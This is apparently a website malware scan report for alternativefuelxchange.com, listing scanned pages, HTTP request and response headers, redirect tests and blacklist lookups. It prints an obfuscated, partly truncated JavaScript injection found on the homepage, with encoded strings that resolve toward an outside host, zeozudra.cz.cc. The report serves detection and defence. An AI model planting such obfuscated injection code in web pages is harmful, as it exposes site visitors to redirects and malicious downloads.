Scanned pages/files
Request | Server response | Status |
http://alternativefuelxchange.com/ | 200 OK Content-Length: 6602 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function lG(){};jJ="";lG.prototype = {eS : function() {function q(){};function wH(){};return '\u004a\u004a\u004a\u006f\u0049\u0034\u0050\u0077\u0068\u0074\u0074\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0066\u0061\u0075\u006c\u0074\u0067'.replace(/QQQQQQQQ/g, 'YYYYYYYY').slice(8, -1).replace(/YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY/g, 'p://zeozudra.cz.cc
Decoded script:
function () { var bB = function () {return "bB";}; function hU() { } function nK() { } lT = ""; xP.z(); rT = "rT"; var gH = ""; this.qI = ""; var xO = "xO"; var dU = ""; this.vZ = false; wP = ""; }
/*** called setTimeout with function () { var bB = function () {return "bB";}; function hU() { } function nK() { } lT = ""; xP.z(); rT = "rT"; var gH = ""; this.qI = ""; var xO = "xO"; var dU = ""; this.vZ = false; wP = ""; }, 317 */
<html ><head ></head><body ></body></html>
Antivirus reports:
http://alternativefuelxchange.com/trading%20screen.htm | 200 OK Content-Length: 17368 Content-Type: text/html | clean |
http://alternativefuelxchange.com/test404page.js | 404 Not Found Content-Length: 436 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alternativefuelxchange.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 00:00:07 GMT
Accept-Ranges: bytes
ETag: "19ca-496fa9a896111"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6602
Content-Type: text/html
Last-Modified: Thu, 09 Dec 2010 13:56:25 GMT
...6602 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alternativefuelxchange.com
Referer: http://www.google.com/search?q=alternativefuelxchange.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alternativefuelxchange.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alternativefuelxchange.com/
Result: alternativefuelxchange.com is not infected or malware details are not published yet.